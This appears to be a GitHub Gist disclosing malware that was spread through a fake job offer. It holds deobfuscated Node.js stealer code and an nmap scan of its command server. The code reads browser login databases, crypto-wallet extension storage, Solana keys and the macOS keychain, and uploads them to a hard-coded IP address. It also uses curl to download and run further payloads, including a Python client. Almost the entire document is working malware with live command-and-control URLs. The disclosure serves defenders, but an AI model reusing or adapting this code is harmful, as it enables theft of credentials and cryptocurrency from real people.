Last active
August 22, 2024 11:07
-
-
Save HyperCrowd/675095ca245a4eacd284234f78294c15 to your computer and use it in GitHub Desktop.
Malware Disguised As Job Offer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This is deobfuscated code from a Node.js file that runs from the repository in the job offer | |
| // It appears to gather all kinds of identification and password hash files and ships them to 185.235.241.208 | |
| (function (_0x128376, _0x1cdd7b) { | |
| const _0x370f08 = _0x128376(); | |
| while (true) { | |
| try { | |
| const _0x5531ca = parseInt(_0x1dfb(522, '0x43e')) / 1 * (-parseInt(_0x1dfb(497, '0x80')) / 2) + -parseInt(_0x1dfb(372, -46)) / 3 + -parseInt(_0x1dfb(443, 0x65)) / 4 * (parseInt(_0x1dfb(479, '0x90')) / 5) + -parseInt(_0x1dfb(348, '0x375')) / 6 + -parseInt(_0x1dfb(373, -0x23)) / 7 + parseInt(_0x1dfb(502, '0x459')) / 8 + parseInt(_0x1dfb(558, '0x4b1')) / 9 * (parseInt(_0x1dfb(327, -170)) / 10); | |
| if (_0x5531ca === _0x1cdd7b) { | |
| break; | |
| } else { | |
| _0x370f08.push(_0x370f08.shift()); | |
| } | |
| } catch (_0x25f86e) { | |
| _0x370f08.push(_0x370f08.shift()); | |
| } | |
| } | |
| })(_0x55cf, 101689); | |
| function _0x21daab(_0x1099f7, _0x413fb2, _0x59789a, _0x55497c) { | |
| return _0x1dfb(_0x413fb2 - 0x1c5, _0x55497c); | |
| } | |
| function _0x10ea7d(_0x599a14, _0x385b6d, _0x45f59e, _0xb20d3a) { | |
| return _0x1dfb(_0x45f59e + 0x305, _0x385b6d); | |
| } | |
| const _0x1ab683 = function () { | |
| let _0x16e324 = true; | |
| return function (_0x3d9d31, _0x3d8f75) { | |
| const _0x2e957d = _0x16e324 ? function () { | |
| if (_0x3d8f75) { | |
| const _0x5b8ea0 = _0x3d8f75.apply(_0x3d9d31, arguments); | |
| _0x3d8f75 = null; | |
| return _0x5b8ea0; | |
| } | |
| } : function () {}; | |
| _0x16e324 = false; | |
| return _0x2e957d; | |
| }; | |
| }(); | |
| const _0x374832 = _0x1ab683(this, function () { | |
| return _0x374832.toString().search("(((.+)+)+)+$").toString().constructor(_0x374832).search("(((.+)+)+)+$"); | |
| }); | |
| _0x374832(); | |
| const _0x419b5e = function () { | |
| let _0x2f726e = true; | |
| return function (_0x4bb5bb, _0x1071a9) { | |
| const _0x8557 = _0x2f726e ? function () { | |
| if (_0x1071a9) { | |
| const _0x30bafa = _0x1071a9.apply(_0x4bb5bb, arguments); | |
| _0x1071a9 = null; | |
| return _0x30bafa; | |
| } | |
| } : function () {}; | |
| _0x2f726e = false; | |
| return _0x8557; | |
| }; | |
| }(); | |
| const _0xe08a41 = _0x419b5e(this, function () { | |
| const _0x532963 = function () { | |
| let _0x17d7f6; | |
| try { | |
| _0x17d7f6 = Function("return (function() {}.constructor(\"return this\")( ));")(); | |
| } catch (_0x240ab9) { | |
| _0x17d7f6 = window; | |
| } | |
| return _0x17d7f6; | |
| }; | |
| const _0x5383af = _0x532963(); | |
| const _0x5f4f46 = _0x5383af.console = _0x5383af.console || {}; | |
| const _0x319acf = ["log", "warn", "info", "error", "exception", "table", "trace"]; | |
| for (let _0x18efb7 = 0; _0x18efb7 < _0x319acf.length; _0x18efb7++) { | |
| const _0x32061b = _0x419b5e.constructor.prototype.bind(_0x419b5e); | |
| const _0x3a1881 = _0x319acf[_0x18efb7]; | |
| const _0x4d27aa = _0x5f4f46[_0x3a1881] || _0x32061b; | |
| _0x32061b.__proto__ = _0x419b5e.bind(_0x419b5e); | |
| _0x32061b.toString = _0x4d27aa.toString.bind(_0x4d27aa); | |
| _0x5f4f46[_0x3a1881] = _0x32061b; | |
| } | |
| }); | |
| _0xe08a41(); | |
| const _0x4bf942 = require('fs'); | |
| const _0x10095c = require('os'); | |
| const _0x86968b = require("path"); | |
| const _0x1e35b1 = require("request"); | |
| const _0x7cff4d = require("child_process").exec; | |
| const _0x49f25b = _0x10095c.hostname(); | |
| const _0x33f6cf = _0x10095c.platform(); | |
| const _0x5043df = _0x10095c.homedir(); | |
| const _0x3507e0 = _0x10095c.tmpdir(); | |
| const _0x1c8a9f = _0x44f647 => _0x44f647.replace(/^~([a-z]+|\/)/, (_0x39f92e, _0x36e957) => '/' === _0x36e957 ? _0x5043df : _0x86968b.dirname(_0x5043df) + '/' + _0x36e957); | |
| function _0x10a6cf(_0x1b7dae) { | |
| try { | |
| _0x4bf942.accessSync(_0x1b7dae); | |
| return true; | |
| } catch (_0x46d148) { | |
| return false; | |
| } | |
| } | |
| const _0x5ed30d = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"]; | |
| const _0x45c915 = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"]; | |
| const _0x793f19 = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", 'opera']; | |
| const _0x6521fb = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "hnfanknocfeofbddgcijnmhnfnkdnaad", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "aholpfdialjgjfhomihkjbmgjidlcdno"]; | |
| const _0x4b30b9 = async (_0x1e85a6, _0x2c1b98, _0x3daa8b) => { | |
| let _0x3d40d9; | |
| if (!_0x1e85a6 || '' === _0x1e85a6) { | |
| return []; | |
| } | |
| try { | |
| if (!_0x10a6cf(_0x1e85a6)) { | |
| return []; | |
| } | |
| } catch (_0x370829) { | |
| return []; | |
| } | |
| if (!_0x2c1b98) { | |
| _0x2c1b98 = ''; | |
| } | |
| let _0x43433b = []; | |
| for (let _0x2806a7 = 0; _0x2806a7 < 200; _0x2806a7++) { | |
| const _0x54ab1e = _0x1e85a6 + '/' + (0 === _0x2806a7 ? "Default" : "Profile " + _0x2806a7) + "/Local Extension Settings"; | |
| for (let _0x496495 = 0; _0x496495 < _0x6521fb.length; _0x496495++) { | |
| let _0xc48bf2 = _0x54ab1e + '/' + _0x6521fb[_0x496495]; | |
| if (_0x10a6cf(_0xc48bf2)) { | |
| let _0x35e42c = []; | |
| try { | |
| _0x35e42c = _0x4bf942.readdirSync(_0xc48bf2); | |
| } catch (_0x45b13e) { | |
| _0x35e42c = []; | |
| } | |
| _0x35e42c.forEach(async _0x334636 => { | |
| let _0x348a15 = _0x86968b.join(_0xc48bf2, _0x334636); | |
| try { | |
| const _0x8491c = { | |
| filename: "66_" + _0x2c1b98 + _0x2806a7 + '_' + _0x6521fb[_0x496495] + '_' + _0x334636 | |
| }; | |
| if (_0x348a15.includes('.log') || _0x348a15.includes(".ldb")) { | |
| _0x43433b.push({ | |
| 'value': _0x4bf942.createReadStream(_0x348a15), | |
| 'options': _0x8491c | |
| }); | |
| } | |
| } catch (_0x1a004d) {} | |
| }); | |
| } | |
| } | |
| } | |
| if (_0x3daa8b && (_0x3d40d9 = _0x5043df + "/.config/solana/id.json", _0x4bf942.existsSync(_0x3d40d9))) { | |
| try { | |
| const _0x119346 = { | |
| filename: "solana_id.txt" | |
| }; | |
| _0x43433b.push({ | |
| 'value': _0x4bf942.createReadStream(_0x3d40d9), | |
| 'options': _0x119346 | |
| }); | |
| } catch (_0x133caf) {} | |
| } | |
| _0x25cbc1(_0x43433b); | |
| return _0x43433b; | |
| }; | |
| const _0x26fc16 = () => { | |
| const _0x1e0ec6 = _0x1c8a9f('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles"; | |
| let _0x2ba0fb = []; | |
| if (_0x10a6cf(_0x1e0ec6)) { | |
| let _0x22f691 = []; | |
| try { | |
| _0x22f691 = _0x4bf942.readdirSync(_0x1e0ec6); | |
| } catch (_0x549474) { | |
| _0x22f691 = []; | |
| } | |
| let _0xa73e79 = 0; | |
| _0x22f691.forEach(async _0x6f9271 => { | |
| let _0x2f874b = _0x86968b.join(_0x1e0ec6, _0x6f9271); | |
| if (_0x2f874b.includes("-release")) { | |
| let _0xc7393c = _0x86968b.join(_0x2f874b, "/storage/default"); | |
| let _0xe490b3 = []; | |
| _0xe490b3 = _0x4bf942.readdirSync(_0xc7393c); | |
| let _0x36a013 = 0; | |
| _0xe490b3.forEach(async _0x2f7f51 => { | |
| if (_0x2f7f51.includes("moz-extension")) { | |
| let _0x592a90 = _0x86968b.join(_0xc7393c, _0x2f7f51); | |
| _0x592a90 = _0x86968b.join(_0x592a90, "idb"); | |
| let _0x4e1469 = []; | |
| _0x4e1469 = _0x4bf942.readdirSync(_0x592a90); | |
| _0x4e1469.forEach(async _0x2bc427 => { | |
| if (_0x2bc427.includes(".files")) { | |
| let _0x4acd59 = _0x86968b.join(_0x592a90, _0x2bc427); | |
| let _0x155b1a = []; | |
| _0x155b1a = _0x4bf942.readdirSync(_0x4acd59); | |
| _0x155b1a.forEach(_0x4c438f => { | |
| if (!_0x4bf942.statSync(_0x86968b.join(_0x4acd59, _0x4c438f)).isDirectory()) { | |
| let _0x557494 = _0x86968b.join(_0x4acd59, _0x4c438f); | |
| const _0x12d04b = { | |
| filename: _0xa73e79 + '_' + _0x36a013 + '_' + _0x4c438f | |
| }; | |
| _0x2ba0fb.push({ | |
| 'value': _0x4bf942.createReadStream(_0x557494), | |
| 'options': _0x12d04b | |
| }); | |
| } | |
| }); | |
| } | |
| }); | |
| } | |
| }); | |
| _0x36a013 += 1; | |
| } | |
| _0xa73e79 += 1; | |
| }); | |
| _0x25cbc1(_0x2ba0fb); | |
| return _0x2ba0fb; | |
| } | |
| }; | |
| const _0x25cbc1 = _0x17b9ff => { | |
| const _0x2d5a4e = { | |
| type: '99', | |
| hid: "66_" + _0x49f25b, | |
| multi_file: _0x17b9ff | |
| }; | |
| try { | |
| if (_0x17b9ff.length > 0) { | |
| const _0x14ee2b = { | |
| url: "http://185.235.241.208:1224/uploads", | |
| formData: _0x2d5a4e | |
| }; | |
| _0x1e35b1.post(_0x14ee2b, (_0x1e8181, _0x2410e2, _0x41c97d) => {}); | |
| } | |
| } catch (_0x25f17d) {} | |
| }; | |
| const _0x5ee4ab = async (_0x385a51, _0x1d8a72) => { | |
| try { | |
| let _0x206c50 = ''; | |
| _0x206c50 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x385a51[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x385a51[2] : _0x1c8a9f('~/') + "/AppData/" + _0x385a51[0] + "/User Data"; | |
| await _0x4b30b9(_0x206c50, _0x1d8a72 + '_', 0 == _0x1d8a72); | |
| } catch (_0x2460ca) {} | |
| }; | |
| const _0x23d512 = async () => { | |
| let _0x2dca92 = []; | |
| let _0x1e2e66 = _0x5043df + "/Library/Keychains/login.keychain"; | |
| if (_0x4bf942.existsSync(_0x1e2e66)) { | |
| try { | |
| const _0x26aa8b = { | |
| filename: "logkc-db" | |
| }; | |
| _0x2dca92.push({ | |
| 'value': _0x4bf942.createReadStream(_0x1e2e66), | |
| 'options': _0x26aa8b | |
| }); | |
| } catch (_0x5105ef) {} | |
| } else { | |
| _0x1e2e66 += "-db"; | |
| if (_0x4bf942.existsSync(_0x1e2e66)) { | |
| try { | |
| const _0x572c23 = { | |
| filename: 'logkc-db' | |
| }; | |
| _0x2dca92.push({ | |
| 'value': _0x4bf942.createReadStream(_0x1e2e66), | |
| 'options': _0x572c23 | |
| }); | |
| } catch (_0x4b5814) {} | |
| } | |
| } | |
| try { | |
| let _0x5bd64b = _0x5043df + "/Library/Application Support/Google/Chrome"; | |
| if (_0x10a6cf(_0x5bd64b)) { | |
| for (let _0x218aec = 0; _0x218aec < 200; _0x218aec++) { | |
| const _0xe2994b = _0x5bd64b + '/' + (0 === _0x218aec ? "Default" : "Profile " + _0x218aec) + "/Login Data"; | |
| try { | |
| if (!_0x10a6cf(_0xe2994b)) { | |
| continue; | |
| } | |
| const _0x4b27ce = _0x5bd64b + "/ld_" + _0x218aec; | |
| const _0x23c770 = { | |
| filename: 'pld_' + _0x218aec | |
| }; | |
| if (_0x10a6cf(_0x4b27ce)) { | |
| _0x2dca92.push({ | |
| 'value': _0x4bf942.createReadStream(_0x4b27ce), | |
| 'options': _0x23c770 | |
| }); | |
| } else { | |
| _0x4bf942.copyFile(_0xe2994b, _0x4b27ce, _0x4c96ba => { | |
| const _0x1ce0f7 = { | |
| filename: "pld_" + _0x218aec | |
| }; | |
| let _0x3ac7c0 = [{ | |
| 'value': _0x4bf942.createReadStream(_0xe2994b), | |
| 'options': _0x1ce0f7 | |
| }]; | |
| _0x25cbc1(_0x3ac7c0); | |
| }); | |
| } | |
| } catch (_0x3f07b7) {} | |
| } | |
| } | |
| } catch (_0x62f3bd) {} | |
| try { | |
| let _0x26c15c = _0x5043df + "/Library/Application Support/BraveSoftware/Brave-Browser"; | |
| if (_0x10a6cf(_0x26c15c)) { | |
| for (let _0x3b7f92 = 0; _0x3b7f92 < 200; _0x3b7f92++) { | |
| const _0x44603e = _0x26c15c + '/' + (0 === _0x3b7f92 ? "Default" : "Profile " + _0x3b7f92); | |
| try { | |
| if (!_0x10a6cf(_0x44603e)) { | |
| continue; | |
| } | |
| const _0x5ea305 = _0x44603e + "/Login Data"; | |
| const _0x70887a = { | |
| filename: "brld_" + _0x3b7f92 | |
| }; | |
| if (_0x10a6cf(_0x5ea305)) { | |
| _0x2dca92.push({ | |
| 'value': _0x4bf942.createReadStream(_0x5ea305), | |
| 'options': _0x70887a | |
| }); | |
| } else { | |
| _0x4bf942.copyFile(_0x44603e, _0x5ea305, _0x310092 => { | |
| const _0x31d38b = { | |
| filename: "brld_" + _0x3b7f92 | |
| }; | |
| let _0x16ea8d = [{ | |
| 'value': _0x4bf942.createReadStream(_0x44603e), | |
| 'options': _0x31d38b | |
| }]; | |
| _0x25cbc1(_0x16ea8d); | |
| }); | |
| } | |
| } catch (_0x290199) {} | |
| } | |
| } | |
| } catch (_0x1d62a2) {} | |
| _0x25cbc1(_0x2dca92); | |
| return _0x2dca92; | |
| }; | |
| const _0xc3c6be = async (_0x3b8a9c, _0x5bf28f) => { | |
| let _0x215094 = []; | |
| let _0x567bf0 = ''; | |
| _0x567bf0 = 'd' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/Library/Application Support/" + _0x3b8a9c[1] : 'l' == _0x33f6cf[0] ? _0x1c8a9f('~/') + "/.config/" + _0x3b8a9c[2] : _0x1c8a9f('~/') + "/AppData/" + _0x3b8a9c[0] + "/User Data"; | |
| let _0x5dfc53 = _0x567bf0 + "/Local State"; | |
| if (_0x4bf942.existsSync(_0x5dfc53)) { | |
| try { | |
| const _0x526083 = { | |
| filename: _0x5bf28f + "_lst" | |
| }; | |
| _0x215094.push({ | |
| 'value': _0x4bf942.createReadStream(_0x5dfc53), | |
| 'options': _0x526083 | |
| }); | |
| } catch (_0x499ed5) {} | |
| } | |
| try { | |
| if (_0x10a6cf(_0x567bf0)) { | |
| for (let _0x36f1c0 = 0; _0x36f1c0 < 200; _0x36f1c0++) { | |
| const _0x4787d4 = _0x567bf0 + '/' + (0 === _0x36f1c0 ? "Default" : "Profile " + _0x36f1c0); | |
| try { | |
| if (!_0x10a6cf(_0x4787d4)) { | |
| continue; | |
| } | |
| const _0x32d961 = _0x4787d4 + "/Login Data"; | |
| if (!_0x10a6cf(_0x32d961)) { | |
| continue; | |
| } | |
| const _0x5ec5b8 = { | |
| filename: _0x5bf28f + '_' + _0x36f1c0 + '_uld' | |
| }; | |
| _0x215094.push({ | |
| 'value': _0x4bf942.createReadStream(_0x32d961), | |
| 'options': _0x5ec5b8 | |
| }); | |
| } catch (_0x2a6583) {} | |
| } | |
| } | |
| } catch (_0x586607) {} | |
| _0x25cbc1(_0x215094); | |
| return _0x215094; | |
| }; | |
| function _0x1dfb(_0x121b22, _0x569bfc) { | |
| const _0x5b1124 = _0x55cf(); | |
| _0x1dfb = function (_0x55cf27, _0x1dfbfd) { | |
| _0x55cf27 = _0x55cf27 - 324; | |
| let _0x3a5f9b = _0x5b1124[_0x55cf27]; | |
| return _0x3a5f9b; | |
| }; | |
| return _0x1dfb(_0x121b22, _0x569bfc); | |
| } | |
| function _0x55cf() { | |
| const _0x5a3b91 = ['jDasl', 'bfnaelmome', 'WZANW', 'ocyhZ', 'createRead', 'ITmoQ', 'acmacodkjb', '626586QKOwys', '-db', 'jbmgjidlcd', 'raveSoftwa', 'isDirector', 'QnOeo', 'includes', "/Login Dat", 'qYCXQ', 'oogle/Chro', '/Library/K', 'BraveSoftw', 'writeFileS', 'cfgodnhcel', 'OtRxI', 'brld_', 'Google/Chr', 'multi_file', 'mdjonilkdb', 'ome', 'luVIT', 'aTPfH', 'ess', 'opftO', '593601LJvkBJ', '841778iRRESH', 'YbUxM', "era Softwa", 'bind', '/uploads', 'copyFile', 'type', 'JEJPp', "ctor(\"retu", 'lchlghecda', "\\p.zi", '/ld_', 'exception', 'hid', '_lst', 'Roaming/Op', 'HnztH', 'tbRkY', 'pikoobohma', 'phepccionb', 'dgmoleebol', 'lmeeeajnim', 'nhPVS', 'vArxC', 'QNABQ', 'mnkoeoihof', 'google-chr', 'hzOCu', 'sKbCj', 'replace', '__proto__', 'hifafgmccd', '/pdown', 'fhbohimael', 'length', 'fPJcj', 'nkbihfbeog', 'Local/Goog', 'rXFAW', 'Browser', '/storage/d', 'dirname', 'jgjfhomihk', '/.config/', 'ASXZy', 'prKfQ', 'TwIlw', 'aholpfdial', 'are/Brave-', 'post', 'RXVCE', 'rocur', 'venWy', 'TOOSD', 'trace', 'dvphq', 'logkc-db', "rn this\")(", 'idb', 'fOXRo', 'log', '.235.241.2', 'illa/Firef', '(((.+)+)+)', 'warn', 'search', 'sNyAe', '.files', 'VfvFG', 'pld_', '332VsuwBT', 'accessSync', 'olana/id.j', '/Library/A', 'readdirSyn', 'mCwlp', 'nmhnfnkdna', 'forEach', 'obpzz', 'LypkF', 'ogin.keych', 'sHyUX', 'FYgWS', 'era', '/.npl', 'on.exe', 'Stream', "/.npl\"", 'NsbmG', 'gpafnldhgm', '-release', 'PjIlM', 'lTVRM', 'apagcccfch', "curl -Lo \"", 'rename', 'ocal/Micro', 'CVwNs', 'eofbddgcij', 'Default', 'rmSync', " Support/G", 'hFzaP', 'path', 'vZmKU', 'EhRaM', '6565xQYeIL', 'statSync', 'eychains/l', 'MYSfc', 'ync', 'ibnejdfjmm', 'dCXnR', " Support/", 'pNxZc', 'pekplomjjk', "/Local Sta", 'lBygL', 'NoXjx', 'yfwOi', 'soft/Edge/', "ension Set", 'toString', '/AppData/L', '200mTHErI', 'ion', 'prototype', 'uuEFX', 'oaming/Moz', '223256niZPRB', 'Mdeso', 'eSoftware/', "\\.pyp\\pyth", '/AppData/', 'apply', 'pplication', 'existsSync', 'table', 'rowser', 'YRqkK', 'ox/Profile', 'request', 'size', 'url', 'homedir', 'yDMWZ', 'lKScI', 'mtwkM', "Profile ", '298yMMeNA', 'lvHTA', 'PuOBA', 'kodbefgpgk', 'push', 'get', "re/Opera S", 'ain', " -C ", 'kkGlZ', 'filename', 'behhmhfood', "/Local Ext", "python3 \"", " Support/B", 'solana_id.', 'dlcobpjiig', 'http://185', 'console', 'renameSync', 'bohpjbbldc', 'exec', 'kpcnlpebkl', 'iZLcK', 'HsAKs', 'SclKp', 'NBGSX', 'moz-extens', 'ngcnapndod', 'kqXRf', 'Local/Brav', 'BwWom', 'constructo', 'QDGqv', "nction() ", 'OJuxT', '300843JNscGT', '/client/', "/User Data", 'RDWcG', 'info', '190QQTawu', 'error', 'hnfanknocf', 'platform', '.ldb', 'join', '/.config/s', 'son', 'tmpdir', 'aBHIV', 'aeachknmef', "\" \"", 'jemss', "User Data"]; | |
| _0x55cf = function () { | |
| return _0x5a3b91; | |
| }; | |
| return _0x55cf(); | |
| } | |
| let _0x4148ac = 0; | |
| const _0x501629 = async _0x237baf => { | |
| _0x7cff4d("tar -xf " + _0x237baf + " -C " + _0x5043df, (_0x2072a1, _0x345f24, _0x49310c) => { | |
| if (_0x2072a1) { | |
| _0x4bf942.rmSync(_0x237baf); | |
| return void (_0x4148ac = 0); | |
| } | |
| _0x4bf942.rmSync(_0x237baf); | |
| _0x5bc0ed(); | |
| }); | |
| }; | |
| const _0x3003d9 = () => { | |
| const _0x3a3cb9 = _0x3507e0 + "\\p.zi"; | |
| const _0x3198e3 = _0x3507e0 + "\\p2.zip"; | |
| if (_0x4148ac >= 51476596) { | |
| return; | |
| } | |
| if (_0x4bf942.existsSync(_0x3a3cb9)) { | |
| try { | |
| var _0x27df9a = _0x4bf942.statSync(_0x3a3cb9); | |
| if (_0x27df9a.size >= 51476596) { | |
| _0x4148ac = _0x27df9a.size; | |
| _0x4bf942.rename(_0x3a3cb9, _0x3198e3, _0x39725c => { | |
| if (_0x39725c) { | |
| throw _0x39725c; | |
| } | |
| _0x501629(_0x3198e3); | |
| }); | |
| } else { | |
| if (_0x4148ac < _0x27df9a.size) { | |
| _0x4148ac = _0x27df9a.size; | |
| } else { | |
| _0x4bf942.rmSync(_0x3a3cb9); | |
| _0x4148ac = 0; | |
| } | |
| _0x187c02(); | |
| } | |
| } catch (_0x2370ad) {} | |
| } else { | |
| _0x7cff4d("curl -Lo \"" + _0x3a3cb9 + "\" \"" + "http://185.235.241.208:1224/pdown" + "\"", (_0x511ce7, _0x220c64, _0x4db374) => { | |
| if (_0x511ce7) { | |
| _0x4148ac = 0; | |
| return void _0x187c02(); | |
| } | |
| try { | |
| _0x4148ac = 51476596; | |
| _0x4bf942.renameSync(_0x3a3cb9, _0x3198e3); | |
| _0x501629(_0x3198e3); | |
| } catch (_0xe8dc33) {} | |
| }); | |
| } | |
| }; | |
| function _0x187c02() { | |
| setTimeout(() => { | |
| _0x3003d9(); | |
| }, 20000); | |
| } | |
| const _0x5bc0ed = async () => await new Promise((_0x25ed5d, _0x3d0abd) => { | |
| if ('w' == _0x33f6cf[0]) { | |
| if (_0x4bf942.existsSync(_0x5043df + "\\.pyp\\python.exe")) { | |
| (() => { | |
| const _0x3aee97 = _0x5043df + "/.npl"; | |
| const _0x38e97c = "\"" + _0x5043df + "\\.pyp\\python.exe\" \"" + _0x3aee97 + "\""; | |
| try { | |
| _0x4bf942.rmSync(_0x3aee97); | |
| } catch (_0x47bcb4) {} | |
| _0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x414c88, _0x478c51, _0x45991a) => { | |
| if (!_0x414c88) { | |
| try { | |
| _0x4bf942.writeFileSync(_0x3aee97, _0x45991a); | |
| _0x7cff4d(_0x38e97c, (_0x2f4109, _0x5a82d5, _0x32d80a) => {}); | |
| } catch (_0x476d41) {} | |
| } | |
| }); | |
| })(); | |
| } else { | |
| _0x3003d9(); | |
| } | |
| } else { | |
| (() => { | |
| _0x1e35b1.get("http://185.235.241.208:1224/client/99/66", (_0x25b30d, _0x373ce0, _0x473979) => { | |
| if (!_0x25b30d) { | |
| _0x4bf942.writeFileSync(_0x5043df + "/.npl", _0x473979); | |
| _0x7cff4d("python3 \"" + _0x5043df + "/.npl\"", (_0x190e98, _0x16b004, _0x4a9630) => {}); | |
| } | |
| }); | |
| })(); | |
| } | |
| }); | |
| var _0x152224 = 0; | |
| const _0x59f5ea = async () => { | |
| try { | |
| await (async () => { | |
| try { | |
| await _0x5ee4ab(_0x45c915, 0); | |
| await _0x5ee4ab(_0x5ed30d, 1); | |
| await _0x5ee4ab(_0x793f19, 2); | |
| _0x26fc16(); | |
| if ('w' == _0x33f6cf[0]) { | |
| await _0x4b30b9(_0x1c8a9f('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false); | |
| } | |
| if ('d' == _0x33f6cf[0]) { | |
| await _0x23d512(); | |
| } else { | |
| await _0xc3c6be(_0x45c915, 0); | |
| await _0xc3c6be(_0x5ed30d, 1); | |
| await _0xc3c6be(_0x793f19, 2); | |
| } | |
| } catch (_0xc8f850) {} | |
| })(); | |
| _0x5bc0ed(); | |
| } catch (_0x58c825) {} | |
| }; | |
| _0x59f5ea(); | |
| _0x5bc0ed(); | |
| let _0x56c931 = setInterval(() => { | |
| if ((_0x152224 += 1) < 5) { | |
| _0x59f5ea(); | |
| } else { | |
| clearInterval(_0x56c931); | |
| } | |
| }, 30000); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Full nmap of that IP address | |
| PORT STATE SERVICE VERSION | |
| 80/tcp open http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12) | |
| |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 | |
| |_https-redirect: ERROR: Script execution failed (use -d to debug) | |
| 135/tcp open msrpc Microsoft Windows RPC | |
| 139/tcp open netbios-ssn Microsoft Windows netbios-ssn | |
| 443/tcp open ssl/http Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12) | |
| |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 | |
| | ssl-cert: Subject: commonName=localhost | |
| | Not valid before: 2009-11-10T23:48:47 | |
| |_Not valid after: 2019-11-08T23:48:47 | |
| | tls-alpn: | |
| |_ http/1.1 | |
| 445/tcp open microsoft-ds? | |
| 1224/tcp open http Node.js Express framework | |
| |_http-cors: HEAD GET POST PUT DELETE PATCH | |
| |_http-title: Error | |
| 1245/tcp open isbconference2? | |
| | fingerprint-strings: | |
| | GetRequest, HTTPOptions: | |
| | HTTP/1.1 200 OK | |
| | Content-Length: 3225 | |
| | Content-Disposition: inline; filename="index.html" | |
| | Accept-Ranges: bytes | |
| | ETag: "43ce08108386f188edae0956cdb185c8f9c9f804" | |
| | Content-Type: text/html; charset=utf-8 | |
| | Vary: Accept-Encoding | |
| | Date: Tue, 30 Jul 2024 23:34:33 GMT | |
| | Connection: close | |
| |_ <!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="Web site created using create-react-app"/><link rel="apple-touch-icon" href="/logo192.png"/><link rel="stylesheet" href="/assets/bootstrap/dist/css/bootstrap.min.css"><link rel="manifest" href="/manifest.json"/><title>L-Administrator</title><link href="/static/css/main.f2117e3f.chunk.css" rel="stylesheet"></head><body><noscript>You need to enable JavaScript to run this | |
| 3306/tcp open mysql MariaDB (unauthorized) | |
| 3389/tcp open ms-wbt-server Microsoft Terminal Services | |
| | rdp-ntlm-info: | |
| | Target_Name: WIN-BS656MOF35Q | |
| | NetBIOS_Domain_Name: WIN-BS656MOF35Q | |
| | NetBIOS_Computer_Name: WIN-BS656MOF35Q | |
| | DNS_Domain_Name: WIN-BS656MOF35Q | |
| | DNS_Computer_Name: WIN-BS656MOF35Q | |
| | Product_Version: 10.0.20348 | |
| |_ System_Time: 2024-07-30T23:35:19+00:00 | |
| | ssl-cert: Subject: commonName=WIN-BS656MOF35Q | |
| | Not valid before: 2024-07-15T14:16:49 | |
| |_Not valid after: 2025-01-14T14:16:49 | |
| |_ssl-date: 2024-07-30T23:35:27+00:00; -1s from scanner time. | |
| 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | |
| |_http-server-header: Microsoft-HTTPAPI/2.0 | |
| |_http-title: Not Found | |
| 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | |
| |_http-server-header: Microsoft-HTTPAPI/2.0 | |
| |_http-title: Not Found | |
| 49664/tcp open msrpc Microsoft Windows RPC | |
| 49665/tcp open msrpc Microsoft Windows RPC | |
| 49666/tcp open msrpc Microsoft Windows RPC | |
| 49667/tcp open msrpc Microsoft Windows RPC | |
| 49668/tcp open msrpc Microsoft Windows RPC | |
| 49669/tcp open msrpc Microsoft Windows RPC | |
| 49671/tcp open msrpc Microsoft Windows RPC | |
| 52444/tcp open msrpc Microsoft Windows RPC | |
| 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : | |
| SF-Port1245-TCP:V=7.80%I=7%D=7/30%Time=66A97889%P=x86_64-pc-linux-gnu%r(Ge | |
| SF:tRequest,DB5,"HTTP/1\.1\x20200\x20OK\r\nContent-Length:\x203225\r\nCont | |
| SF:ent-Disposition:\x20inline;\x20filename=\"index\.html\"\r\nAccept-Range | |
| SF:s:\x20bytes\r\nETag:\x20\"43ce08108386f188edae0956cdb185c8f9c9f804\"\r\ | |
| SF:nContent-Type:\x20text/html;\x20charset=utf-8\r\nVary:\x20Accept-Encodi | |
| SF:ng\r\nDate:\x20Tue,\x2030\x20Jul\x202024\x2023:34:33\x20GMT\r\nConnecti | |
| SF:on:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><meta\ | |
| SF:x20charset=\"utf-8\"/><link\x20rel=\"icon\"\x20href=\"/favicon\.ico\"/> | |
| SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,initial-scal | |
| SF:e=1\"/><meta\x20name=\"theme-color\"\x20content=\"#000000\"/><meta\x20n | |
| SF:ame=\"description\"\x20content=\"Web\x20site\x20created\x20using\x20cre | |
| SF:ate-react-app\"/><link\x20rel=\"apple-touch-icon\"\x20href=\"/logo192\. | |
